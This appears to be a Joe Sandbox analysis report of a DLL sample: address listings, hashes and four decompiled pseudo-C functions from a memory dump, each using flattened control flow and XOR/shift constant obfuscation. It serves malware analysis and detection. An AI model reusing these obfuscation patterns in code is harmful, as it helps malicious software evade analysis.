                                                                                                                                                                            0x02f570dd
                                                                                                                                                                            0x02f570e7
                                                                                                                                                                            0x02f570ec
                                                                                                                                                                            0x02f570f1
                                                                                                                                                                            0x02f570f5
                                                                                                                                                                            0x02f570fc
                                                                                                                                                                            0x02f57103
                                                                                                                                                                            0x02f5710a
                                                                                                                                                                            0x02f57111
                                                                                                                                                                            0x02f57118
                                                                                                                                                                            0x02f57122
                                                                                                                                                                            0x02f57127
                                                                                                                                                                            0x02f5712f
                                                                                                                                                                            0x02f57134
                                                                                                                                                                            0x02f5713c
                                                                                                                                                                            0x02f57141
                                                                                                                                                                            0x02f57146
                                                                                                                                                                            0x02f5714d
                                                                                                                                                                            0x02f57154
                                                                                                                                                                            0x02f57158
                                                                                                                                                                            0x02f5715b
                                                                                                                                                                            0x02f57162
                                                                                                                                                                            0x02f5716c
                                                                                                                                                                            0x02f5716f
                                                                                                                                                                            0x02f57170
                                                                                                                                                                            0x02f57173
                                                                                                                                                                            0x02f57186
                                                                                                                                                                            0x02f5718d
                                                                                                                                                                            0x02f57192
                                                                                                                                                                            0x02f57193
                                                                                                                                                                            0x02f57195
                                                                                                                                                                            0x02f57196
                                                                                                                                                                            0x02f5719b
                                                                                                                                                                            0x02f5719f
                                                                                                                                                                            0x02f571a9
                                                                                                                                                                            0x02f571b2

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 'iY
                                                                                                                                                                            • API String ID: 0-1691070665
                                                                                                                                                                            • Opcode ID: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
                                                                                                                                                                            • Instruction ID: be9d50f4fd237ba61582544aaf594eb82e6b8e74f344bb403da538b9dd78ac6d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
                                                                                                                                                                            • Instruction Fuzzy Hash: 22412472E00219EBEF08DFA5D94A9EEFBB2FB44304F208059D615BB290D7B55A15CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E02F66187(void* __ecx) {
                                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				void* _t52;
                                                                                                                                                                            				void* _t56;
                                                                                                                                                                            				void* _t58;
                                                                                                                                                                            				void* _t59;
                                                                                                                                                                            				void* _t61;
                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                            				signed int* _t64;
                                                                                                                                                                            
                                                                                                                                                                            				_t58 = __ecx;
                                                                                                                                                                            				_t64 =  &_v36;
                                                                                                                                                                            				_v12 = 0x9a6334;
                                                                                                                                                                            				_t59 = 0x428baaa;
                                                                                                                                                                            				_v8 = 0x1104ea;
                                                                                                                                                                            				_t62 = 0;
                                                                                                                                                                            				_v4 = 0;
                                                                                                                                                                            				_v28 = 0xb15b0c;
                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                            				_v28 = _v28 * 0x1d;
                                                                                                                                                                            				_v28 = _v28 ^ 0xf86649d6;
                                                                                                                                                                            				_v28 = _v28 ^ 0xec767c96;
                                                                                                                                                                            				_v36 = 0x38db19;
                                                                                                                                                                            				_v36 = _v36 ^ 0x5bdda26a;
                                                                                                                                                                            				_v36 = _v36 + 0xffff005e;
                                                                                                                                                                            				_v36 = _v36 | 0xaa371973;
                                                                                                                                                                            				_v36 = _v36 ^ 0xfbf0c1f1;
                                                                                                                                                                            				_v32 = 0x2e8edf;
                                                                                                                                                                            				_v32 = _v32 | 0x3500a324;
                                                                                                                                                                            				_v32 = _v32 ^ 0x353f0f34;
                                                                                                                                                                            				_v32 = _v32 >> 0xd;
                                                                                                                                                                            				_v32 = _v32 ^ 0x000af409;
                                                                                                                                                                            				_v16 = 0xfc04c2;
                                                                                                                                                                            				_v16 = _v16 >> 0xe;
                                                                                                                                                                            				_v16 = _v16 ^ 0x000f83ee;
                                                                                                                                                                            				_v20 = 0xce9672;
                                                                                                                                                                            				_v20 = _v20 | 0xcae5864f;
                                                                                                                                                                            				_v20 = _v20 ^ 0xcae41209;
                                                                                                                                                                            				_v24 = 0x20b296;
                                                                                                                                                                            				_v24 = _v24 | 0x98e19d34;
                                                                                                                                                                            				_v24 = _v24 ^ 0x98e5764e;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t59 != 0x2638d08) {
                                                                                                                                                                            						if(_t59 == 0x428baaa) {
                                                                                                                                                                            							_t59 = 0x994f089;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t59 == 0x994f089) {
                                                                                                                                                                            								_push(_t58);
                                                                                                                                                                            								_t56 = E02F607F0();
                                                                                                                                                                            								_t64 =  &(_t64[1]);
                                                                                                                                                                            								_t59 = 0x2638d08;
                                                                                                                                                                            								_t62 = _t62 + _t56;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L7;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t58 = _t61 + 4;
                                                                                                                                                                            					_t52 = E02F6BE8C(_t58, _v32, _v16, _v20, _v24);
                                                                                                                                                                            					_t64 =  &(_t64[3]);
                                                                                                                                                                            					_t59 = 0xb7af90a;
                                                                                                                                                                            					_t62 = _t62 + _t52;
                                                                                                                                                                            					L7:
                                                                                                                                                                            				} while (_t59 != 0xb7af90a);
                                                                                                                                                                            				return _t62;
                                                                                                                                                                            			}



















                                                                                                                                                                            0x02f66187
                                                                                                                                                                            0x02f66187
                                                                                                                                                                            0x02f6618a
                                                                                                                                                                            0x02f66192
                                                                                                                                                                            0x02f66197
                                                                                                                                                                            0x02f661a2
                                                                                                                                                                            0x02f661a9
                                                                                                                                                                            0x02f661b2
                                                                                                                                                                            0x02f661c0
                                                                                                                                                                            0x02f661c2
                                                                                                                                                                            0x02f661c6
                                                                                                                                                                            0x02f661ce
                                                                                                                                                                            0x02f661d6
                                                                                                                                                                            0x02f661de
                                                                                                                                                                            0x02f661e6
                                                                                                                                                                            0x02f661ee
                                                                                                                                                                            0x02f661f6
                                                                                                                                                                            0x02f661fe
                                                                                                                                                                            0x02f66206
                                                                                                                                                                            0x02f6620e
                                                                                                                                                                            0x02f66216
                                                                                                                                                                            0x02f6621b
                                                                                                                                                                            0x02f66223
                                                                                                                                                                            0x02f6622b
                                                                                                                                                                            0x02f66230
                                                                                                                                                                            0x02f66238
                                                                                                                                                                            0x02f66240
                                                                                                                                                                            0x02f66248
                                                                                                                                                                            0x02f66250
                                                                                                                                                                            0x02f66258
                                                                                                                                                                            0x02f66260
                                                                                                                                                                            0x02f66268
                                                                                                                                                                            0x02f66268
                                                                                                                                                                            0x02f66272
                                                                                                                                                                            0x02f6628f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f66274
                                                                                                                                                                            0x02f66276
                                                                                                                                                                            0x02f66280
                                                                                                                                                                            0x02f66281
                                                                                                                                                                            0x02f66286
                                                                                                                                                                            0x02f66289
                                                                                                                                                                            0x02f6628b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6628b
                                                                                                                                                                            0x02f66276
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f66272
                                                                                                                                                                            0x02f66297
                                                                                                                                                                            0x02f662a6
                                                                                                                                                                            0x02f662ab
                                                                                                                                                                            0x02f662ae
                                                                                                                                                                            0x02f662b3
                                                                                                                                                                            0x02f662b5
                                                                                                                                                                            0x02f662b5
                                                                                                                                                                            0x02f662c6

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ^
                                                                                                                                                                            • API String ID: 0-1590793086
                                                                                                                                                                            • Opcode ID: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
                                                                                                                                                                            • Instruction ID: 96e743172c618f3d9f8e8eb8ed56c2d4cc2add0339ac76400bb6e7348bf075c6
                                                                                                                                                                            • Opcode Fuzzy Hash: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
                                                                                                                                                                            • Instruction Fuzzy Hash: F53156726093429FC718CF25958941FBBE5FBC4788F104A1DF585A6220D3B9DA1ACB93
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E02F6CAD5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				void* _t69;
                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                            				signed int _t78;
                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                            				intOrPtr* _t87;
                                                                                                                                                                            
                                                                                                                                                                            				_t87 = _a8;
                                                                                                                                                                            				_t86 = _a12;
                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                            				_push(_t87);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				E02F6FE29(_t69);
                                                                                                                                                                            				_v32 = _v32 & 0x00000000;
                                                                                                                                                                            				_v28 = _v28 & 0x00000000;
                                                                                                                                                                            				_v36 = 0xc93ec5;
                                                                                                                                                                            				_a8 = 0xcab84b;
                                                                                                                                                                            				_a8 = _a8 >> 1;
                                                                                                                                                                            				_a8 = _a8 | 0xee18e3b9;
                                                                                                                                                                            				_a8 = _a8 ^ 0xee71da74;
                                                                                                                                                                            				_v16 = 0x1dfffe;
                                                                                                                                                                            				_v16 = _v16 | 0x90f94c10;
                                                                                                                                                                            				_v16 = _v16 ^ 0x90ff99a5;
                                                                                                                                                                            				_v12 = 0xe4edc;
                                                                                                                                                                            				_v12 = _v12 ^ 0xcefa836b;
                                                                                                                                                                            				_v12 = _v12 ^ 0xcefa5bee;
                                                                                                                                                                            				_a12 = 0xedd33e;
                                                                                                                                                                            				_a12 = _a12 ^ 0xf7b2c6ca;
                                                                                                                                                                            				_a12 = _a12 | 0xdc5ffd20;
                                                                                                                                                                            				_a12 = _a12 ^ 0xadaf2279;
                                                                                                                                                                            				_a12 = _a12 ^ 0x52f8ee07;
                                                                                                                                                                            				_v8 = 0x14e12c;
                                                                                                                                                                            				_t78 = 6;
                                                                                                                                                                            				_v8 = _v8 * 0xa;
                                                                                                                                                                            				_v8 = _v8 / _t78;
                                                                                                                                                                            				_v8 = _v8 ^ 0x002f50e1;
                                                                                                                                                                            				_v24 = 0x3584ef;
                                                                                                                                                                            				_v24 = _v24 ^ 0xd7b39bf3;
                                                                                                                                                                            				_v24 = _v24 ^ 0xd7855a87;
                                                                                                                                                                            				_v20 = 0x11ef3f;
                                                                                                                                                                            				_v20 = _v20 ^ 0xad5d4e81;
                                                                                                                                                                            				_v20 = _v20 ^ 0xad432fff;
                                                                                                                                                                            				E02F60A90(_a8, _v16, _v12, _t86, _a12,  *((intOrPtr*)(_t87 + 4)));
                                                                                                                                                                            				E02F6C9B0(_v8,  *((intOrPtr*)(_t86 + 0x34)), _v24,  *((intOrPtr*)(_t87 + 4)),  *_t87, _v20);
                                                                                                                                                                            				_t76 =  *((intOrPtr*)(_t87 + 4));
                                                                                                                                                                            				 *((intOrPtr*)(_t86 + 0x34)) =  *((intOrPtr*)(_t86 + 0x34)) + _t76;
                                                                                                                                                                            				return _t76;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x02f6cadc
                                                                                                                                                                            0x02f6cae0
                                                                                                                                                                            0x02f6cae3
                                                                                                                                                                            0x02f6cae4
                                                                                                                                                                            0x02f6cae5
                                                                                                                                                                            0x02f6caea
                                                                                                                                                                            0x02f6caef
                                                                                                                                                                            0x02f6caf5
                                                                                                                                                                            0x02f6caf9
                                                                                                                                                                            0x02f6cb00
                                                                                                                                                                            0x02f6cb07
                                                                                                                                                                            0x02f6cb0a
                                                                                                                                                                            0x02f6cb11
                                                                                                                                                                            0x02f6cb18
                                                                                                                                                                            0x02f6cb1f
                                                                                                                                                                            0x02f6cb26
                                                                                                                                                                            0x02f6cb2d
                                                                                                                                                                            0x02f6cb34
                                                                                                                                                                            0x02f6cb3b
                                                                                                                                                                            0x02f6cb42
                                                                                                                                                                            0x02f6cb49
                                                                                                                                                                            0x02f6cb50
                                                                                                                                                                            0x02f6cb57
                                                                                                                                                                            0x02f6cb5e
                                                                                                                                                                            0x02f6cb65
                                                                                                                                                                            0x02f6cb72
                                                                                                                                                                            0x02f6cb73
                                                                                                                                                                            0x02f6cb7b
                                                                                                                                                                            0x02f6cb7e
                                                                                                                                                                            0x02f6cb85
                                                                                                                                                                            0x02f6cb8c
                                                                                                                                                                            0x02f6cb93
                                                                                                                                                                            0x02f6cb9a
                                                                                                                                                                            0x02f6cba1
                                                                                                                                                                            0x02f6cba8
                                                                                                                                                                            0x02f6cbbf
                                                                                                                                                                            0x02f6cbd5
                                                                                                                                                                            0x02f6cbda
                                                                                                                                                                            0x02f6cbe0
                                                                                                                                                                            0x02f6cbe8

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: P/
                                                                                                                                                                            • API String ID: 0-4116444305
                                                                                                                                                                            • Opcode ID: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
                                                                                                                                                                            • Instruction ID: 693fde7b8857a6f45d46fa30b83f697c4d544ec2a072ee09f2a76bf30ad4b91e
                                                                                                                                                                            • Opcode Fuzzy Hash: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
                                                                                                                                                                            • Instruction Fuzzy Hash: B4314771901349EFCF04CFA1CA0699FBBB1FF44304F108549E926A6220C7B59761DF81
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                            			E02F72B09(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				unsigned int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				void* _t59;
                                                                                                                                                                            				signed int _t68;
                                                                                                                                                                            				void* _t74;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_t74 = __edx;
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t59);
                                                                                                                                                                            				_v8 = 0x93d6ec;
                                                                                                                                                                            				_v8 = _v8 << 7;
                                                                                                                                                                            				_v8 = _v8 + 0xffff3f9a;
                                                                                                                                                                            				_v8 = _v8 >> 0xb;
                                                                                                                                                                            				_v8 = _v8 ^ 0x00010f7f;
                                                                                                                                                                            				_v16 = 0x446197;
                                                                                                                                                                            				_v16 = _v16 >> 4;
                                                                                                                                                                            				_v16 = _v16 + 0xffff9430;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00039bf5;
                                                                                                                                                                            				_v12 = 0x6cea88;
                                                                                                                                                                            				_v12 = _v12 >> 1;
                                                                                                                                                                            				_t68 = 0x54;
                                                                                                                                                                            				_v12 = _v12 / _t68;
                                                                                                                                                                            				_v12 = _v12 + 0x3de4;
                                                                                                                                                                            				_v12 = _v12 ^ 0x00083458;
                                                                                                                                                                            				_v20 = 0x13246e;
                                                                                                                                                                            				_v20 = _v20 << 0xf;
                                                                                                                                                                            				_v20 = _v20 << 0xf;
                                                                                                                                                                            				_v20 = _v20 ^ 0x800a585e;
                                                                                                                                                                            				_v20 = 0x9dc8c5;
                                                                                                                                                                            				_v20 = _v20 + 0xe5f4;
                                                                                                                                                                            				_v20 = _v20 + 0xffffcd2d;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00910c57;
                                                                                                                                                                            				_v12 = 0x6d0957;
                                                                                                                                                                            				_v12 = _v12 << 1;
                                                                                                                                                                            				_v12 = _v12 ^ 0xc39cd689;
                                                                                                                                                                            				_v12 = _v12 ^ 0x6e460985;
                                                                                                                                                                            				_v12 = _v12 ^ 0xad0dfd5a;
                                                                                                                                                                            				return E02F60C2A(E02F728EB(), _v20, _t68, _v12, _t74);
                                                                                                                                                                            			}










                                                                                                                                                                            0x02f72b10
                                                                                                                                                                            0x02f72b13
                                                                                                                                                                            0x02f72b15
                                                                                                                                                                            0x02f72b18
                                                                                                                                                                            0x02f72b19
                                                                                                                                                                            0x02f72b1a
                                                                                                                                                                            0x02f72b1f
                                                                                                                                                                            0x02f72b29
                                                                                                                                                                            0x02f72b2f
                                                                                                                                                                            0x02f72b36
                                                                                                                                                                            0x02f72b3a
                                                                                                                                                                            0x02f72b41
                                                                                                                                                                            0x02f72b48
                                                                                                                                                                            0x02f72b4c
                                                                                                                                                                            0x02f72b53
                                                                                                                                                                            0x02f72b5a
                                                                                                                                                                            0x02f72b61
                                                                                                                                                                            0x02f72b69
                                                                                                                                                                            0x02f72b6c
                                                                                                                                                                            0x02f72b6f
                                                                                                                                                                            0x02f72b76
                                                                                                                                                                            0x02f72b7d
                                                                                                                                                                            0x02f72b84
                                                                                                                                                                            0x02f72b88
                                                                                                                                                                            0x02f72b8c
                                                                                                                                                                            0x02f72b93
                                                                                                                                                                            0x02f72b9a
                                                                                                                                                                            0x02f72ba1
                                                                                                                                                                            0x02f72ba8
                                                                                                                                                                            0x02f72baf
                                                                                                                                                                            0x02f72bb6
                                                                                                                                                                            0x02f72bb9
                                                                                                                                                                            0x02f72bc0
                                                                                                                                                                            0x02f72bc7
                                                                                                                                                                            0x02f72bef

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Wm
                                                                                                                                                                            • API String ID: 0-1953712011
                                                                                                                                                                            • Opcode ID: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
                                                                                                                                                                            • Instruction ID: a31a095337c331ab9bbe026fc5749110b72619e3569e72d98b19149fa681cda3
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
                                                                                                                                                                            • Instruction Fuzzy Hash: 3521F271D00319EBDB55DFE4D94A4EEBFB1FB00358F108699D42966250D7B50B88DF80
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                            			E02F51CA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				char _v552;
                                                                                                                                                                            				signed int _v556;
                                                                                                                                                                            				intOrPtr _v560;
                                                                                                                                                                            				signed int _v564;
                                                                                                                                                                            				signed int _v568;
                                                                                                                                                                            				signed int _v572;
                                                                                                                                                                            				signed int _v576;
                                                                                                                                                                            				signed int _v580;
                                                                                                                                                                            				signed int _v584;
                                                                                                                                                                            				signed int _v588;
                                                                                                                                                                            				signed int _v592;
                                                                                                                                                                            				signed int _v596;
                                                                                                                                                                            				signed int _v600;
                                                                                                                                                                            				void* _t99;
                                                                                                                                                                            				void* _t109;
                                                                                                                                                                            				void* _t112;
                                                                                                                                                                            				signed int _t126;
                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                            				signed int* _t131;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t99);
                                                                                                                                                                            				_v556 = _v556 & 0x00000000;
                                                                                                                                                                            				_t131 =  &(( &_v600)[4]);
                                                                                                                                                                            				_v560 = 0x11afe4;
                                                                                                                                                                            				_v572 = 0x705fac;
                                                                                                                                                                            				_v572 = _v572 >> 3;
                                                                                                                                                                            				_t112 = 0x5dfd87c;
                                                                                                                                                                            				_v572 = _v572 ^ 0x000e0be5;
                                                                                                                                                                            				_v600 = 0x66ffbc;
                                                                                                                                                                            				_v600 = _v600 << 5;
                                                                                                                                                                            				_v600 = _v600 + 0xffffdeb6;
                                                                                                                                                                            				_v600 = _v600 >> 3;
                                                                                                                                                                            				_v600 = _v600 ^ 0x019de099;
                                                                                                                                                                            				_v564 = 0xb3cc88;
                                                                                                                                                                            				_v564 = _v564 >> 0xc;
                                                                                                                                                                            				_v564 = _v564 ^ 0x000695d5;
                                                                                                                                                                            				_v576 = 0xedaac2;
                                                                                                                                                                            				_v576 = _v576 | 0x8d88b270;
                                                                                                                                                                            				_t126 = 0xa;
                                                                                                                                                                            				_v576 = _v576 / _t126;
                                                                                                                                                                            				_v576 = _v576 ^ 0x0e34170c;
                                                                                                                                                                            				_v568 = 0xd34644;
                                                                                                                                                                            				_v568 = _v568 << 0xd;
                                                                                                                                                                            				_v568 = _v568 ^ 0x68c9882a;
                                                                                                                                                                            				_v596 = 0xa76cec;
                                                                                                                                                                            				_v596 = _v596 + 0xf564;
                                                                                                                                                                            				_v596 = _v596 | 0x7a23d379;
                                                                                                                                                                            				_t127 = 0x75;
                                                                                                                                                                            				_v596 = _v596 / _t127;
                                                                                                                                                                            				_v596 = _v596 ^ 0x010c78ac;
                                                                                                                                                                            				_v588 = 0xf6d5ff;
                                                                                                                                                                            				_v588 = _v588 ^ 0x1e4d5d29;
                                                                                                                                                                            				_v588 = _v588 | 0xf865f4c1;
                                                                                                                                                                            				_v588 = _v588 ^ 0xfef0a2a0;
                                                                                                                                                                            				_v592 = 0xc86264;
                                                                                                                                                                            				_v592 = _v592 + 0xffff9c97;
                                                                                                                                                                            				_v592 = _v592 << 0xb;
                                                                                                                                                                            				_v592 = _v592 + 0x20dd;
                                                                                                                                                                            				_v592 = _v592 ^ 0x3ff909a0;
                                                                                                                                                                            				_v584 = 0x196fa2;
                                                                                                                                                                            				_v584 = _v584 >> 3;
                                                                                                                                                                            				_v584 = _v584 | 0xe537cc6c;
                                                                                                                                                                            				_v584 = _v584 ^ 0xe53246df;
                                                                                                                                                                            				_v580 = 0xb6108b;
                                                                                                                                                                            				_v580 = _v580 + 0xfdd;
                                                                                                                                                                            				_v580 = _v580 << 3;
                                                                                                                                                                            				_v580 = _v580 ^ 0x05ba306f;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t112 != 0x5b30f91) {
                                                                                                                                                                            						if(_t112 == 0x5dfd87c) {
                                                                                                                                                                            							_t109 = E02F6FE2A(_v600, _v564, _v572,  &_v552);
                                                                                                                                                                            							_t112 = 0xb74f612;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t112 == 0xb74f612) {
                                                                                                                                                                            								_t109 = E02F52F80( &_v520, _v576, _v568, _v596);
                                                                                                                                                                            								_t131 =  &(_t131[3]);
                                                                                                                                                                            								_t112 = 0x5b30f91;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L7;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F606FE(_v588, _v592, _a8,  &_v520, _v584, _t112,  &_v552, _v580);
                                                                                                                                                                            					_t131 =  &(_t131[6]);
                                                                                                                                                                            					_t112 = 0xf20a46f;
                                                                                                                                                                            					L7:
                                                                                                                                                                            				} while (_t112 != 0xf20a46f);
                                                                                                                                                                            				return _t109;
                                                                                                                                                                            			}























                                                                                                                                                                            0x02f51cab
                                                                                                                                                                            0x02f51cb2
                                                                                                                                                                            0x02f51cb9
                                                                                                                                                                            0x02f51cba
                                                                                                                                                                            0x02f51cbb
                                                                                                                                                                            0x02f51cc0
                                                                                                                                                                            0x02f51cc5
                                                                                                                                                                            0x02f51cc8
                                                                                                                                                                            0x02f51cd2
                                                                                                                                                                            0x02f51cdf
                                                                                                                                                                            0x02f51ce4
                                                                                                                                                                            0x02f51ce6
                                                                                                                                                                            0x02f51cf3
                                                                                                                                                                            0x02f51d00
                                                                                                                                                                            0x02f51d05
                                                                                                                                                                            0x02f51d0d
                                                                                                                                                                            0x02f51d12
                                                                                                                                                                            0x02f51d1a
                                                                                                                                                                            0x02f51d22
                                                                                                                                                                            0x02f51d27
                                                                                                                                                                            0x02f51d2f
                                                                                                                                                                            0x02f51d37
                                                                                                                                                                            0x02f51d45
                                                                                                                                                                            0x02f51d4a
                                                                                                                                                                            0x02f51d50
                                                                                                                                                                            0x02f51d58
                                                                                                                                                                            0x02f51d60
                                                                                                                                                                            0x02f51d65
                                                                                                                                                                            0x02f51d6d
                                                                                                                                                                            0x02f51d75
                                                                                                                                                                            0x02f51d7d
                                                                                                                                                                            0x02f51d89
                                                                                                                                                                            0x02f51d91
                                                                                                                                                                            0x02f51d95
                                                                                                                                                                            0x02f51d9d
                                                                                                                                                                            0x02f51da5
                                                                                                                                                                            0x02f51dad
                                                                                                                                                                            0x02f51db5
                                                                                                                                                                            0x02f51dbd
                                                                                                                                                                            0x02f51dc5
                                                                                                                                                                            0x02f51dcd
                                                                                                                                                                            0x02f51dd2
                                                                                                                                                                            0x02f51dda
                                                                                                                                                                            0x02f51de2
                                                                                                                                                                            0x02f51dea
                                                                                                                                                                            0x02f51def
                                                                                                                                                                            0x02f51df7
                                                                                                                                                                            0x02f51dff
                                                                                                                                                                            0x02f51e07
                                                                                                                                                                            0x02f51e0f
                                                                                                                                                                            0x02f51e14
                                                                                                                                                                            0x02f51e1c
                                                                                                                                                                            0x02f51e1c
                                                                                                                                                                            0x02f51e22
                                                                                                                                                                            0x02f51e55
                                                                                                                                                                            0x02f51e5c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f51e24
                                                                                                                                                                            0x02f51e26
                                                                                                                                                                            0x02f51e38
                                                                                                                                                                            0x02f51e3d
                                                                                                                                                                            0x02f51e40
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f51e40
                                                                                                                                                                            0x02f51e26
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f51e22
                                                                                                                                                                            0x02f51e82
                                                                                                                                                                            0x02f51e87
                                                                                                                                                                            0x02f51e8a
                                                                                                                                                                            0x02f51e8c
                                                                                                                                                                            0x02f51e8c
                                                                                                                                                                            0x02f51e9a

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
